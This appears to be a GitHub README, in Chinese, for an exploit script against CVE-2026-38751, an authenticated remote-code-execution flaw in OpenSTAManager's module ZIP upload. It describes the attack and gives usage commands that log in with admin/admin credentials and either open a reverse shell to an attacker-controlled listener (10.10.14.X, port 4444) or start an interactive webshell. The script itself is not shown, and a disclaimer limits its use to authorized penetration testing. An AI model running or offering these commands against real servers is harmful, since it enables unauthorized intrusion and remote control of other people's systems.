Why-Shell/CVE-2026-38751
GitHub: Why-Shell/CVE-2026-38751
针对 OpenSTAManager 模块上传漏洞(CVE-2026-38751)的利用脚本,通过未经验证的 ZIP 上传实现远程代码执行。
Stars: 0 | Forks: 0
# CVE-2026-38751 — OpenSTAManager 模块上传 RCE
通过模块更新端点中未经验证的 ZIP 上传实现经过身份验证的 RCE。
**受影响版本:** OpenSTAManager <= 2.10.x
## 环境要求
pip install requests
## 用法
```
# 反弹 shell(Penelope 或任何 listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# 交互式 webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
```
## 参考资料
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
## 免责声明
仅供授权的渗透测试和教育目的使用。
标签:CISA项目, Python, RCE, 威胁模拟, 无后门, 逆向工具